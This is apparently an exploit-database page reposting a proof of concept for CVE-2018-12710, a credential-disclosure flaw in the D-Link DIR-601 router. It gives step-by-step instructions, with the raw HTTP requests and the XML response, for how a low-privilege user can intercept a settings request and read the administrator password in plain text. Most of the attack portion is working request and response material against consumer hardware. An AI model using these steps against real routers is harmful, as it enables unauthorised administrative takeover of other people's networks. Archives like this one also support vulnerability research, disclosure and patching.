Registerdlink dir601 credential disclosure
▸▸▸ Exploit & Vulnerability >> webapps exploit & hardware vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: DLink DIR-601 - Credential Disclosure # Google Dork: N/A # Date: 2018-06-24 # Exploit Author: Kevin Randall # Vendor Homepage: https://www.dlink.com # Software Link: N/A # Version: Firmware: 2.02NA Hardware Version B1 # Tested on: Windows 10 + Mozilla Firefox # CVE : CVE-2018-12710 # 1. Description # Being local to the network and having only "User" account (which is a low privilege account) # access, an attacker can intercept the response from a POST request to obtain "Admin" # rights due to the admin password being displayed in XML. # 2. Proof of Concept # Tools to use: # - BurpSuite # - Browser of your choice # 3: Login with "User" role account: *My "User" role account does not have a password in this example* POST /my_cgi.cgi?0.4008728147399542 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: en-AU,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/login_real.htm Content-Type: application/x-www-form-urlencoded Content-Length: 64 DNT: 1 Connection: close request=login&user_user_name=dXNlcg==&user_user_pwd=&user_type=1 # 4: When logged into the access point, click on the Tools option # 5: You should see a request similar to the following: POST /my_cgi.cgi?0.9277791631615954 HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: */* Accept-Language: en-AU,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://192.168.0.1/tools_admin.htm Content-Type: application/x-www-form-urlencoded Content-Length: 277 DNT: 1 Connection: close request=load_settings&table_name=admin_user&table_name=user_user&table_name=graph_auth&table_name=remote_management&table_name=system&table_name=virtual_server&table_name=port_forwarding&table_name=application_rules&table_name=inbound_filter&table_name=fw_ver&table_name=hw_ver # 6: Right click on this request and choose "Do Intercept response from this request" # 7: You will see a response similar to the following: HTTP/1.1 200 OK Content-type: text/xml Connection: close Date: Sat, 01 Jan 2011 00:19:56 GMT Server: lighttpd/1.4.28 Content-Length: 20088 <?xml version="1.0" encoding="UTF-8"?><root><login_level>0</login_level><admin_user><admin_user_name>admin</admin_user_name> <admin_user_pwd>testagain</admin_user_pwd><admin_level>1</admin_level></admin_user><user_user><user_user_name>user</user_user_name> <user_user_pwd></user_user_pwd><user_level>0 ...
Dlink dir601 credential disclosure Vulnerability / Exploit Source : Dlink dir601 credential disclosure
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes